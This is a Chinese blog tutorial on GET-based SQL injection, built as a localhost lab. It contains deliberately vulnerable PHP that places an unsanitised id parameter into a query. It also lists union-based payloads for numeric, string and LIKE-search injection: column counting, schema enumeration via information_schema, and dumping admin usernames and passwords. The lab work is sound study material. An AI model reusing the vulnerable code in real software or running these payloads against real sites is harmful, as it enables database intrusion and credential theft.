美文网首页
sql注入GET型

sql注入GET型

作者: CSeroad | 来源:发表于2018-01-01 16:20 被阅读462次

偶听到小迪的教程,根据教程课后自己搭建学习,感谢小迪教程!

实验环境:

wampserver2.4-x86,Sublime Text 3

实验步骤:

在mysql数据库中新建数据表

test表

插入数据

三条数据

数字型注入

使用Sublime Text 3编写php代码

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>sql数字型注入</title>

<body>

<?php

//数字型注入

$id=@$_GET['id'];

//不报错

if(isset($id)&&!empty($id)){

$con=mysql_connect("127.0.0.1","root","");//连接数据库

mysql_select_db("cmsdomo",$con);//选择数据库

$sql="select * from test where id=$id";//sql语句

$result=mysql_query($sql);

while($row=mysql_fetch_array($result)){

echo "ID:".$row['id']."<br/>";

echo "用户名:".$row['name']."<br/>";

//循环输出

}

mysql_close($con);//关闭数据库

echo "<hr/>";

echo "当前执行的sql语句:".$sql;

}else{

echo "没有获取到ID";

}

?>

</body>

</html>

代码不是很美观,再附加一张图片

数字型注入

将代码保存为demo.php,放在C:/wamp/www,进行访问

在浏览器中输入http://127.0.0.1/demo.php

从源代码中可以看到,sql语句直接接收了id参数值,存在明显的sql注入

正常

输入id=1,查询到结果,返回正常

返回错误

加单引号,报错,存在注入点

查询字段

使用order by 查询该表的字段数,order by 2返回正常,3返回不正常,证明存在两个字段

查询到数据库

使用database()函数爆出数据库名

查询表名

使用该语句查询数据表,语句如下

union select table_name,2 from information_schema.tables where table_schema = database()

注意字段数为2

查询admin表的字段

查询admin表,语句如下:

union  select  column_name,2  from  information_schema.columns  where  table_schema=database()  and table_name=0x61646D696E

注意0x61646D696E为admin的十六进制编码

查询密码

获取信息,语句为:

union select username,password from admin

注意:还是两个字段,所以是username,password

字符型注入

修改php源代码的sql语句

字符型

再次测试

闭合单引号

语句为:

id=1' union select 1,2  and  '1'='1

同理以上的数字型注入

搜索型注入

修改源代码,下面不变

like匹配 单引号报错,存在sql注入 %和'的闭合

语句为

key=a%'  order  by  2  and  '%=

同理数字型注入

相关文章

  • 部分笔记(未完待续)

    0x01 SQL注入 1.GET型SQL注入 http://192.168.0.8:2333/pentest/sq...

  • DVWA之“SQL注入”

    漏洞类型:SQL注入/Get 字符型 安全级别:Low 目标:通过注入SQL语句,获取 MySql 数据库存放的用...

  • sql注入GET型

    偶听到小迪的教程,根据教程课后自己搭建学习,感谢小迪教程! 实验环境: wampserver2.4-x86,Sub...

  • sql-lab基础挑战1~10(持续更新)

    Lesson 1 基于错误的GET单引号字符型注入sql-lab1.png Lesson 2 Lesson 3 L...

  • sql注入的一些笔记

    注入分类 数字型注入 -字符型注入 搜索型注入 XX型注入 注入提交方式 -get提交-post提交-cookie...

  • PHP 安全问题入门:常见安全问题 + 实例讲解

    1. SQL 注入

  • web安全。 简述SQL注入、XSS、CSRF

    SQL注入 SQL注入攻击就是攻击者把SQL语句写入到表单的输入框或者页面get请求的查询字符串,来达到欺骗服务器...

  • SQL注入-字符型注入

    特别声明:该文章只运用于学习安全测试交流之用,请勿用于其他 第一步:确认注入点类型 参数中输入' --+页面无报错...

  • Less1

    基于报错的sql注入 字符型注入 数字型 括号型推测sql语句 **union ** 联合查询的方法,主要利用my...

  • sql 注入笔记

    SQL注入 判断数字型和字符型还有闭合的原理 数字型的sql语句: 字符型的sql语句: 拿数字型来说,你不管在后...

网友评论

      本文标题:sql注入GET型

      本文链接:https://www.haomeiwen.com/subject/jzstnxtx.html